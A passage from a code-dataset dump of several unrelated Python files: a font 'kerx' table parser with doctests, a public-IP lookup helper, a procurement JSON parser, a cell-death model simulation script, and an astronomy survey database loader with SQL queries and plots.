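for (tag, index), seq in sorted(order.items(), key=operator.itemgetter(1)):
    print(seq, tag, index)  # prints sequences 0, 1, 2 in order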
Now we need to\n # retrieve the Feature objects so we can ascertain the ordering.\n \n featDict = gposObj.features\n orderDict = {}\n \n for featTag in allFeats:\n featObj = featDict[featTag]\n \n for lkupIndex, lkupObj in enumerate(featObj):\n orderDict[(featTag, lkupIndex)] = lkupObj.sequence\n \n # Now we're ready to start converting, and additionally filling in the\n # backmap (or a throwaway local version, if one wasn't specified).\n \n it = sorted(orderDict.items(), key=operator.itemgetter(1))\n backMap = kwArgs.pop('backMap', {})\n \n for (featTag, lkupIndex), sequence in it:\n lkupObj = featDict[featTag][lkupIndex]\n \n for subObj in lkupObj:\n gTuples, eTuples = subObj.effects(**kwArgs)\n v = gposconverter.analyze(gTuples, eTuples, **kwArgs)\n \n rg = range(len(r), len(r) + len(v))\n backMap.setdefault(featTag, set()).update(rg)\n r.extend(v)\n \n return r\n \n @classmethod\n def fromkern(cls, k, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified Kern object.\n \"\"\"\n \n def _it():\n for oldTable in k:\n if oldTable.format == 0:\n yield format0.Format0.fromkern_format0(oldTable)\n elif oldTable.format == 1:\n yield format1.Format1.fromkern_format1(oldTable)\n else:\n raise ValueError(\"Unknown old 'kern' subtable format!\")\n \n return cls(_it())\n \n @classmethod\n def fromvalidatedwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a new Kerx object from the specified walker, doing\n source validation.\n \n >>> s = _testingValues[1].binaryString()\n >>> logger = utilities.makeDoctestLogger(\"fvw\")\n >>> fvb = Kerx.fromvalidatedbytes\n >>> obj = fvb(s, logger=logger)\n fvw.kerx - DEBUG - Walker has 54 remaining bytes.\n fvw.kerx.subtable 0.format0 - DEBUG - Walker has 34 remaining bytes.\n >>> obj == _testingValues[1]\n True\n \n >>> fvb(s[:1], logger=logger)\n fvw.kerx - DEBUG - Walker has 1 remaining bytes.\n fvw.kerx - ERROR - Insufficient bytes.\n \"\"\"\n \n logger = kwArgs.pop('logger', logging.getLogger())\n logger = logger.getChild(\"kerx\")\n \n logger.debug((\n 'V0001',\n (w.length(),),\n \"Walker has %d remaining bytes.\"))\n \n if w.length() < 8:\n logger.error(('V0004', (), \"Insufficient bytes.\"))\n return None\n \n version, numTables = w.unpack(\"2L\")\n\n if version not in {0x20000, 0x30000}:\n logger.error((\n 'V0002',\n (version,),\n \"Expected version 0x00020000 or 0x00030000 but got 0x%08X.\"))\n \n return None\n \n r = cls(\n [None] * numTables,\n originalVersion=version,\n preferredVersion=version)\n\n kwArgs.pop('tupleIndex', None)\n kwArgs.pop('coverage', None)\n\n newTables = []\n for i in range(numTables):\n itemLogger = logger.getChild(\"subtable %d\" % (i,))\n \n if w.length() < 4:\n itemLogger.error(('V0004', (), \"Insufficient bytes.\"))\n return None\n \n byteLength = w.unpack(\"L\") - 12 # i.e. 
what's left after the header\n cov = coverage.Coverage.fromvalidatedwalker(w, logger=itemLogger)\n \n if cov is None:\n return None\n \n if w.length() < 5:\n itemLogger.error((\n 'V0790',\n (),\n \"The coverage and tupleIndex are missing or incomplete.\"))\n \n return None\n \n format, tupleIndex = w.unpack(\"BL\")\n \n if format not in _makers_validated:\n itemLogger.error((\n 'V0791',\n (format,),\n \"Subtable format %d is not valid.\"))\n \n return None\n \n wSub = w.subWalker(0, relative=True, newLimit=byteLength)\n \n thisSubtable = _makers_validated[format](\n wSub,\n coverage = cov,\n tupleIndex = tupleIndex,\n logger = itemLogger,\n **kwArgs)\n \n if thisSubtable is None:\n return None\n \n newTables.append(thisSubtable)\n w.skip(byteLength)\n\n if version == 0x30000:\n subtableGlyphCoverageSets = SubTableGlyphCoverageSets.fromwalker(\n w, numTables, **kwArgs)\n for i, thisSubtable in enumerate(newTables):\n thisSubtable.glyphCoverageSet = subtableGlyphCoverageSets[i]\n\n for i, thisSubtable in enumerate(newTables):\n r[i] = thisSubtable\n\n return r\n \n @classmethod\n def fromwalker(cls, w, **kwArgs):\n \"\"\"\n Creates and returns a Kerx object from the specified walker.\n \n >>> obj = _testingValues[1]\n >>> obj == Kerx.frombytes(obj.binaryString())\n True\n \"\"\"\n \n version, numTables = w.unpack(\"2L\")\n \n if version not in {0x20000, 0x30000}:\n raise ValueError(\"Unknown 'kerx' version: 0x%08X!\" % (version,))\n \n r = cls(\n [None] * numTables,\n originalVersion=version,\n preferredVersion=version)\n kwArgs.pop('tupleIndex', None)\n kwArgs.pop('coverage', None)\n\n newTables = []\n for i in range(numTables):\n byteLength = w.unpack(\"L\") - 12 # i.e. what's left after header\n cov = coverage.Coverage.fromwalker(w)\n format, tupleIndex = w.unpack(\"BL\")\n \n if format not in _makers:\n \n raise ValueError(\n \"Unknown 'kerx' subtable format: %d\" % (format,))\n \n wSub = w.subWalker(0, relative=True, newLimit=byteLength)\n \n thisSubtable = _makers[format](\n wSub,\n coverage = cov,\n tupleIndex = tupleIndex,\n **kwArgs)\n\n newTables.append(thisSubtable)\n w.skip(byteLength)\n\n if version == 0x30000:\n subtableGlyphCoverageSets = SubTableGlyphCoverageSets.fromwalker(\n w, numTables, **kwArgs)\n for i, thisSubtable in enumerate(newTables):\n thisSubtable.glyphCoverageSet = subtableGlyphCoverageSets[i]\n\n for i, thisSubtable in enumerate(newTables):\n r[i] = thisSubtable\n\n return r\n\n# -----------------------------------------------------------------------------\n\n#\n# Test code\n#\n\nif 0:\n def __________________(): pass\n\nif __debug__:\n from fontio3 import utilities\n from fontio3.utilities import namer\n \n def _makeGPOS():\n from fontio3.GPOS import (\n GPOS,\n pairglyphs,\n pairglyphs_key,\n pairvalues,\n value)\n \n from fontio3.opentype import (\n featuredict,\n featuretable,\n langsys,\n langsys_optfeatset,\n langsysdict,\n lookup,\n scriptdict)\n \n # Return a GPOS with (15, 32) kerned -18, and (20, 30) kerned +14\n v1 = value.Value(xPlacement=-18)\n v2 = value.Value(xPlacement=14)\n pv1 = pairvalues.PairValues(second=v1)\n pv2 = pairvalues.PairValues(second=v2)\n k1 = pairglyphs_key.Key((15, 32))\n k2 = pairglyphs_key.Key((20, 30))\n pairObj = pairglyphs.PairGlyphs({k1: pv1, k2: pv2})\n lkObj = lookup.Lookup([pairObj])\n ftObj = featuretable.FeatureTable([lkObj])\n featObj = featuredict.FeatureDict({b'kern0001': ftObj})\n \n optSetObj = langsys_optfeatset.OptFeatSet({b'kern0001'})\n lsObj = langsys.LangSys(optionalFeatures=optSetObj)\n lsdObj = 
langsysdict.LangSysDict({}, defaultLangSys=lsObj)\n scptObj = scriptdict.ScriptDict({b'latn': lsdObj})\n return GPOS.GPOS(features=featObj, scripts=scptObj)\n \n _f0tv = format0._testingValues\n _f2tv = format2._testingValues\n \n _testingValues = (\n Kerx([]),\n Kerx([_f0tv[1]]),\n Kerx([_f2tv[1]]))\n \n del _f0tv\n\ndef _test():\n import doctest\n doctest.testmod()\n\nif __name__ == \"__main__\":\n if __debug__:\n _test()\n","sub_path":"fontio3/build/lib.linux-x86_64-3.6/fontio3/kerx/kerx.py","file_name":"kerx.py","file_ext":"py","file_size_in_byte":18017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"153657303","text":"from __future__ import print_function\n\n__title__ = 'pif.checkers.tnx.nl.pif_ip_checker'\n__author__ = 'Bruno Santeramo'\n__copyright__ = 'Copyright (c) 2016 Bruno Santeramo'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = ('TnxIPChecker',)\n\nfrom requests import get\n\nfrom pif.base import BasePublicIPChecker, registry\n\nclass TnxIPChecker(BasePublicIPChecker):\n \"\"\"\n Checks IPs using tnx.nl.\n \"\"\"\n uid = 'tnx.nl'\n\n def get_public_ip(self):\n \"\"\"\n Gets public IP.\n\n :return str:\n \"\"\"\n try:\n data = get('http://tnx.nl/ip').text.rstrip()\n return data\n except Exception as e:\n if self.verbose:\n print(e)\n\n\nregistry.register(TnxIPChecker)\n","sub_path":"Domain/Python/site-packages/pif/checkers/tnx/pif_ip_checker.py","file_name":"pif_ip_checker.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"445696518","text":"import json, os\n\n\nclass parser_json_bec:\n \"\"\"Classe para parseamento de json's\"\"\"\n\n def __init__(self):\n pass\n\n def parse_bec_basico(self, file_path, multiple=False):\n resultados = []\n if multiple:\n arquivos = []\n for f in os.listdir(file_path):\n arquivos.append(file_path + \"/\" + f)\n else:\n arquivos = [file_path]\n for a in arquivos:\n json_dct = json.load(open(a, \"r\"))[0]\n # # PREGÕES\n # if 'DESC_ATA_GERADAPR' in json_dct and json_dct['DESC_ATA_GERADAPR']:\n # \tnumero_oc = json_dct['OC']\n # \tuf = json_dct['UF']\n # \tmodalidade = json_dct['MODALIDADE']\n # \tente_federativo = json_dct['DESC_ATA_GERADAPR']['OCCompleta']['EnteFederativo']\n # \tresponsaveis = str(json_dct['DESC_ATA_GERADAPR']['OCCompleta']['Responsaveis'])\n # \tequipe_apoio = str(json_dct['DESC_ATA_GERADAPR']['OCCompleta']['EquipeApoio'])\n # \tdata_ini = json_dct['DT_INICIO']\n # \tdata_fim = json_dct['DT_FIM']\n # \tresultados.append((numero_oc, uf, modalidade, ente_federativo, responsaveis, equipe_apoio, data_ini, data_fim))\n if (\n \"DESC_ATA_GERADACV_ENCERRAMENTO\" in json_dct\n and json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"]\n ):\n numero_oc = json_dct[\"OC\"]\n uf = json_dct[\"UF\"]\n modalidade = json_dct[\"MODALIDADE\"]\n ente_federativo = (\n json_dct[\"UNIDADE_COMPRADORA\"]\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n try:\n responsaveis = (\n str(json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"][\"RESPONSAVEL\"])\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n except:\n responsaveis = (\n str(json_dct[\"DESC_ATA_GERADACV_ENCERRAMENTO\"][\"RESPONSAVEIS\"])\n .replace('\"', \"\")\n .replace(\"\\\\\", \"\")\n .replace(\"'\", \"\")\n )\n equipe_apoio = \"\"\n data_ini = json_dct[\"DT_INICIO\"]\n data_fim = json_dct[\"DT_FIM\"]\n resultados.append(\n (\n numero_oc,\n uf,\n modalidade,\n ente_federativo,\n responsaveis,\n 
equipe_apoio,\n                        data_ini,\n                        data_fim,\n                    )\n                )\n        return resultados\n\n\ndef main():\n    p = parser_json_bec()\n    p.parse_bec_basico("/home/danilo/Downloads/BEC_json")\n\n\nif __name__ == "__main__":\n    main()\n","sub_path":"common_nlp/parser_json_bec.py","file_name":"parser_json_bec.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"438535116","text":"# Runs ANRM 1.0 (Irvin et. al 2013) under a range of pro-apoptotic and pro-necrotic caspase 8\n# concentrations.\n\nimport numpy as np\nimport pylab as p\nimport matplotlib as mpl\nimport pickle\nfrom anrm.numtools import calibratortools as ct\nfrom anrm.numtools import simulator_1_0 as sim\n\n# ----------Model and Initial Conditions----------------\nfrom anrm.irvin_anrm_model import model\n\nrange_Bid = [0, 4000, 8000, 12044, 16000, 20000]\n\n#-----------Calibrated Parameters-----------------------\nposition = pickle.load(open('irvin_anrm_model_fitted_params.pkl'))\n\n#-----------Simulator Settings--------------------------\nsims = sim.Settings()\nsims.model = model\nsims.tspan = np.linspace(0,28800,3000) #8hrs converted to seconds (3000 timepoints)\nsims.estimate_params = model.parameters_rules()\nsims.rtol = 1e-5\nsims.atol = 1e-5\n\nsolve = sim.Solver(sims)\nsolve.run()\n\ndelta_td = []\napopt_td = []\nnecro_td = []\n\np.ion()\nyout = []\n\ncondition_variable = 'Bid_0'\ngraph_name = 'Bid'\nobservable = 'RIP1_FADD'\ngraph_obs = 'RIP1-FADD binding'\nrangecv = range_Bid\n\nfor i in rangecv:\n    #-----------Initial Conditions--------------------------\n    ic_params = model.parameters_initial_conditions()\n    conditions = ct.initial_conditions([condition_variable, 'TNFa_0', 'Bax_0', 'Bak_0'], [i, 1500, 0, 0], ic_params)\n    ysim = solve.simulate(position = position, observables=True, initial_conc = conditions)\n    \n    #-----------Plot Parp and MLKL--------------------------\n    yout.append(ct.extract_records(ysim, [observable]))\n\nfor j in range(len(rangecv)):\n    p.plot(sims.tspan/3600.0, yout[j], label = '%s %s per cell' % (rangecv[j], graph_name), linewidth = 3)\n\np.title('%s in WT cells with 25ng/mL TNF and varying initial %s concentrations' % (graph_obs, graph_name))\np.xlabel('time [hrs]')\np.ylabel('%s [molecules per cell]' % graph_obs)\np.legend(bbox_to_anchor = [0.9, -0.25])\n\n","sub_path":"Figures/Fig5C_RIPFADD_vs_Bid_in_DKO.py","file_name":"Fig5C_RIPFADD_vs_Bid_in_DKO.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"171287639","text":"#for making a file list\nimport glob\nimport numpy as np\nfrom astropy.table import Table\nimport sqlite3 as lite\nimport pandas as pd\n#for checking if something is nan\nimport math\n\n#name of the database\ndb_name = "survey_database.db"\n\ndef makeFileList(mypath, extension):\n\t"""\n\tMakes list of files with certain file extension\n\t\n\tInput: mypath (str), extension (str): for example .fits\n\t\n\tReturns: str array (location of files)\n\t"""\n\tobjectfiles = glob.glob(mypath + '*' + extension)\n\tobjectfiles = np.sort(objectfiles)\n\t\n\treturn objectfiles\n\ndef createDB():\n\t"""\n\tCreate the database with the required columns\n\t"""\n\t\n\t#the keys of the three tables of the database\n\t#note that ID = identifier for every image (= catalogue)\n\tposdata_keys = np.array(['StarID','FieldID','Ra','Dec','X','Y'])\n\tfieldinfo_keys = np.array(['ID','FieldID', 'Filename', 
'MJD','Airmass','Exptime','Filter'])\n\tfluxdata_keys = np.array(['StarID','ID','Flux1','dFlux1','Flux2', 'dFlux2','Flux3','dFlux3','Mag1','dMag1','Mag2','dMag2','Mag3','dMag3','Class'])\n\t#the names of the tables\n\ttablenames = np.array(['PosData','FieldInfo','FluxData'])\n\t\n\t#check if the database exists\n\tif len(glob.glob(db_name)) > 0:\n\t\treturn {tablenames[0]:posdata_keys, tablenames[1]:fieldinfo_keys, tablenames[2]:fluxdata_keys}, tablenames\n\t\t\n\tprint('Creating new database with name \"{0}\"...'.format(db_name))\n\t\t\n\tcon = lite.connect(db_name)\n\tcur = con.cursor()\n\n\t#create the table for the positional data\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(StarID INT, \n\tFieldID INT,\n\tRa FLOAT, \n\tDec FLOAT, \n\tX FLOAT, \n\tY FLOAT)\"\"\".format(tablenames[0])\n\tcur.execute(createtable) #run command\n\t\n\t\n\t#create the table for the field info like date and exposure time\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(ID INT,\n\tFieldID INT, \n\tFilename varchar(255),\n\tMJD DOUBLE,\n\tAirmass FLOAT,\n\tExptime INT,\n\tFilter varchar(5))\"\"\".format(tablenames[1])\n\tcur.execute(createtable) #run command\n\t\n\t#create the table for the fluxes and the magnitudes\n\tcreatetable = \"\"\"CREATE TABLE IF NOT EXISTS {0} \n\t(StarID INT,\n\tID INT, \n\tFlux1 FLOAT,\n\tdFlux1 FLOAT,\n\tFlux2 FLOAT,\n\tdFlux2 FLOAT,\n\tFlux3 FLOAT,\n\tdFlux3 FLOAT,\n\tMag1 FLOAT,\n\tdMag1 FLOAT,\n\tMag2 FLOAT,\n\tdMag2 FLOAT,\n\tMag3 FLOAT,\n\tdMag3 FLOAT,\n\tClass INT\n\t)\"\"\".format(tablenames[2])\n\tcur.execute(createtable) #run command\n\t\n\tcon.close()\n\t\n\treturn {tablenames[0]:posdata_keys, tablenames[1]:fieldinfo_keys, tablenames[2]:fluxdata_keys}, tablenames\n\t\ndef fillTable(dbn, data, keys, tablename):\n\t\"\"\"\n\tFill a table in a database\n\t\"\"\"\n\t\n\t#open the database\n\tcon = lite.connect(dbn)\n\twith con:\n\t\tcur = con.cursor()\n\n\t\t#determine the number of keys\n\t\tnkeys = len(keys)\n\n\t\t#fill the table\n\t\tfor i in np.arange(len(data[keys[0]])):\n\t\t\tinsertcommand = \"INSERT INTO {0} VALUES(\".format(tablename)\n\t\t\t\n\t\t\t#add all the values from the data array row\n\t\t\tfor key, j in zip(keys, np.arange(nkeys)):\n\t\t\t\t#check if there is a nan in the row. 
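# fillTable here assembles INSERT statements by string concatenation,
# quoting strings and special-casing NaN by hand. A sketch of the same
# insert using sqlite3 parameter binding instead, which handles quoting and
# stores None as NULL; the table and rows are illustrative.
import math
import sqlite3

rows = [(1, 'u', 12.5), (2, 'v', float('nan'))]
# Map NaN to None so it lands in the table as NULL.
clean = [tuple(None if isinstance(v, float) and math.isnan(v) else v
               for v in row) for row in rows]

con = sqlite3.connect(':memory:')
con.execute("CREATE TABLE Demo (StarID INT, Filter TEXT, Mag FLOAT)")
con.executemany("INSERT INTO Demo VALUES (?, ?, ?)", clean)
print(con.execute("SELECT * FROM Demo").fetchall())
con.close()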
If so, we have to adjust the \n\t\t\t\t#insert command\n\t\t\t\tif type(data[key][i]) != np.str_ and math.isnan(data[key][i]):\n\t\t\t\t\tinsertcommand += \"NULL\"\n\t\t\t\t#check if we have to add quotations around the data\n\t\t\t\telif type(data[key][i]) == np.str_:\n\t\t\t\t\tinsertcommand += \"'\" + data[key][i] + \"'\"\n\t\t\t\telse:\n\t\t\t\t\tinsertcommand += str(data[key][i])\n\t\t\t\t\n\t\t\t\t#add commas to seperate the different values\n\t\t\t\tif j < (nkeys - 1):\n\t\t\t\t\tinsertcommand += \",\"\n\t\t\t\t\n\t\t\t#close the command with a bracket\n\t\t\tinsertcommand += \")\"\n\t\t\t\n\t\t\tcur.execute(insertcommand)\n\t\t\t\ndef fillDataBase(dataloc = 'Tables/'):\n\t\"\"\"\n\tFill the database with data from fits tables in the folder 'Tables/'\n\t\"\"\"\n\t\t\n\tallkeys, tablenames = createDB()\n\n\t#load the csv\n\tcsv_data = Table.read('Tables/file_info_for_problem.csv')\n\t#fill the 'FieldInfo' table with the data from the csv\n\tfillTable(db_name, csv_data, allkeys['FieldInfo'], 'FieldInfo')\n\n\t#make a list of the filenames of the fits files\n\tfilelist = makeFileList(dataloc, '.fits')\n\tflistlength = len(filelist)\n\t#loop over all the found filenames\n\tfor fname, i in zip(filelist, np.arange(flistlength)):\n\t\tprint('Loading file {0}/{1}...'.format(i+1, flistlength))\n\n\t\ttabledata = Table.read(fname)\n\n\t\t#find the field ID\n\t\tfID = int(fname[len(dataloc):].split('-')[1])\n\n\t\t#find the filter\n\t\tfilt = fname[len(dataloc):].split('-')[2].split('.')[0]\n\n\t\t#find the image ID using the fieldID and filter\n\t\tiID = csv_data['ID'][(csv_data['Filter'] == filt) * (csv_data['FieldID'] == fID)][0]\n\n\t\t#add the image ID to the table\n\t\ttabledata['ID'] = np.tile([iID], len(tabledata[allkeys['PosData'][0]]))\n\t\t#add Field ID to the table\n\t\ttabledata['FieldID'] = np.tile([fID], len(tabledata[allkeys['PosData'][0]]))\n\n\t\t#insert the data in the PosData and FluxData tables\n\t\tfillTable(db_name, tabledata, allkeys['PosData'], 'PosData')\n\t\tfillTable(db_name, tabledata, allkeys['FluxData'], 'FluxData')\n\ndef makeKDE(data, names, query_id):\n\t\"\"\"\n\tMake a KDE plot of the different columns in the SQL data\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\n\tsns.set(font = 'Latin Modern Roman',rc = {'legend.frameon': True})\n\n\t#the bandwidth to be used\n\tbandwidth = 0.2\n\n\t#rename the columns of the dataframe\n\tdata.columns = names\n\t#remove all none or nan values\n\tdata = data.dropna()\n\n\t# plt.hist(np.array(data_dict['J'])[0])\n\tfor n in names:\n\t\tsns.kdeplot(np.array(data[n]), bw = bandwidth, label = n)\n\n\tplt.legend(loc = 'best', title = 'Filter', shadow = True)\n\tplt.title('KDE plot of database filters with bandwidth = {0}'.format(bandwidth))\n\tplt.xlabel('Magnitude')\n\tplt.ylabel('Probability')\n\tplt.savefig('{0}_visualization.pdf'.format(query_id), dpi = 300)\n\tplt.show()\n\ndef makeHistogram(data, names, query_id):\n\t\"\"\"\n\tMake a histogram of the given SQL output rows\n\t\"\"\"\n\timport matplotlib.pyplot as plt\n\timport seaborn as sns\n\n\tsns.set(font = 'Latin Modern Roman',rc = {'legend.frameon': True})\n\n\t#rename the columns of the dataframe\n\tdata.columns = names\n\t#remove all none or nan values\n\tdata = data.dropna()\n\n\tsns.distplot(data[names[1]], kde = False, color = 'g')\n\t# plt.hist(data[names[1]])\n\n\t# plt.legend(loc = 'best', title = 'Filter', shadow = True)\n\tif query_id == 'R2':\n\t\tplt.title('Histogram of J - H')\n\t\tplt.xlim((1.4, 2.25))\n\t# 
plt.yscale('log')\n\t\tplt.xlabel('J - H')\n\t\tplt.ylabel('Number of stars')\n\telif query_id == 'R3':\n\t\tplt.xlim((-6000, 250000))\n\t\tplt.title('Histogram of Ks flux')\n\t\tplt.xlabel('Flux')\n\t\tplt.ylabel('Number of stars')\n\tplt.savefig('{0}_visualization.pdf'.format(query_id), dpi = 300)\n\tplt.show()\n\ndef saveResults(data, query_id):\n\t\"\"\"\n\tSave the results of a query to a csv file.\n\n\tInput:\n\t\tdata (pandas dataframe): a dataframe containing the data to be saved.\\n\n\t\tquery_id (str): the name of the query.\n\t\"\"\"\n\tdata.to_csv('./Query_results/{0}_results.csv'.format(query_id), index = False)\n\ndef R1():\n\t\"\"\"\n\tTest query R1\n\t\"\"\"\n\tprint('\\nQuery 1:')\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\t\t\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT i.ID, COUNT(f.StarID)\n\t\t\t\tFROM FluxData f JOIN FieldInfo i \n\t\t\t\tON f.ID = i.ID\n\t\t\t\tWHERE f.Flux1/f.dFlux1 > 5 AND f.Class = -1\n\t\t\t\tGROUP BY i.ID HAVING MJD BETWEEN 56800 AND 57300\n\t\t\t\t\"\"\"\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tprint(data)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R1')\n\ndef R2():\n\t\"\"\"\n\tTest query R2\n\t\"\"\"\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT j.StarID, j.Mag1 - h.Mag1\n\t\t\t\tFROM (SELECT f.Mag1, f.StarID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J') j\n\t\t\t\tJOIN (SELECT f.Mag1, f.StarID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'H') h\n\t\t\t\tON j.StarID = h.StarID\n\t\t\t\tWHERE j.Mag1 - h.Mag1 > 1.5\n\t\t\t\tGROUP BY j.StarID\n\t\t\t\t\"\"\"\n\t\t\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tmakeHistogram(data, ['StarID', 'J - H'], 'R2')\n\ndef R3():\n\t\"\"\"\n\tTest query R3\n\t\"\"\"\n\tprint('Warning: this query might take very long')\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT f.StarID, f.Flux1\n\t\t\t\tFROM FluxData f \n\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\tWHERE i.Filter = 'Ks' AND ABS(\n\t\t\t\t\tf.Flux1 - (\n\t\t\t\t\tSELECT AVG(f2.Flux1)\n\t\t\t\t\tFROM FluxData f2\n\t\t\t\t\tJOIN FieldInfo i2 ON f2.ID = i2.ID\n\t\t\t\t\tWHERE f.StarID = f2.StarID AND i2.Filter = 'Ks'\n\t\t\t\t\t)) > (20 * f.dFlux1)\n\t\t\t\tGROUP BY f.StarID\n\t\t\t\t\"\"\"\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R3')\n\n\t\t#it is also possible to load the results from a file, as the query takes\n\t\t#very long to run\n\t\t# data = pd.read_csv('./Query_results/R3_results.csv')\n\t\t\n\t\tmakeHistogram(data, ['StarID', 'Ks flux'], 'R3')\n\ndef R4(fieldid = 1):\n\t\"\"\"\n\tTest query R4. Catalogue = image\n\t\"\"\"\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT ID\n\t\t\t\tFROM FieldInfo\n\t\t\t\tWHERE FieldID = {0}\n\t\t\t\t\"\"\".format(fieldid)\n\n\t\t\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tprint(data)\n\n\t\t#save the data to a csv file\n\t\tsaveResults(data, 'R4')\n\ndef R5(fieldid = 1):\n\t\"\"\"\n\tTest query R5. 
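# Query R3 above selects stars whose Ks flux strays from their own mean by
# more than 20 sigma via a correlated subquery. A sketch of the same cut in
# pandas with groupby/transform, useful as an in-memory cross-check; the
# frame here is synthetic.
import pandas as pd

df = pd.DataFrame({'StarID': [1, 1, 1, 2, 2],
                   'Flux1':  [10.0, 10.2, 55.0, 7.0, 7.1],
                   'dFlux1': [0.5, 0.5, 0.5, 0.4, 0.4]})
star_mean = df.groupby('StarID')['Flux1'].transform('mean')
variable = df[(df['Flux1'] - star_mean).abs() > 20 * df['dFlux1']]
print(variable[['StarID', 'Flux1']])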
The Ks magnitudes are averaged per field.\n\n\tInput:\n\t\tfieldid (int): ID of the field of which the Y, Z, J, H and Ks magnitudes\n\t\tshould be obtained.\n\t\"\"\"\n\t#names of the filters\n\tnames = ['Y', 'Z', 'J', 'H', 'Ks']\n\n\t#open the database\n\tcon = lite.connect(db_name)\n\twith con:\n\n\t\tquery1 = \"\"\"\n\t\t\t\tSELECT Y.Mag1, Z.Mag1, J.Mag1, H.Mag1, Ks.AvgMag1\n\t\t\t\tFROM (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID, f.Class\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Y' AND f.Flux1/f.dFlux1 > 30) Y\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Z' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) Z On Y.StarID = Z.StarID AND Y.FieldID = Z.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'J' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) J On Y.StarID = J.StarID AND Y.FieldID = J.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT f.Mag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'H' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t) H On Y.StarID = H.StarID AND Y.FieldID = H.FieldID\n\t\t\t\tLEFT JOIN (\n\t\t\t\t\tSELECT AVG(f.Mag1) AS AvgMag1, f.StarID, i.FieldID\n\t\t\t\t\tFROM FluxData f \n\t\t\t\t\tJOIN FieldInfo i ON f.ID = i.ID\n\t\t\t\t\tWHERE i.Filter = 'Ks' AND f.Flux1/f.dFlux1 > 30\n\t\t\t\t\tGROUP BY f.StarID, i.ID\n\t\t\t\t) Ks On Y.StarID = Ks.StarID AND Y.FieldID = Ks.FieldID\n\t\t\t\tWHERE Y.FieldID = {0} AND Y.Class = -1\n\t\t\t\t\"\"\".format(fieldid)\n\n\t\t#run the query\n\t\tdata = pd.read_sql(query1, con)\n\n\t\tmakeKDE(data, names, 'R5')\n\ndef loadYJHdata(SN = 10):\n\t\"\"\"\n\tLoad the Y - J and J - H colours of all the stars in the database with\n\tSN > 8.\n\n\tInput:\n\t\tSN (int): signal to noise threshold. 
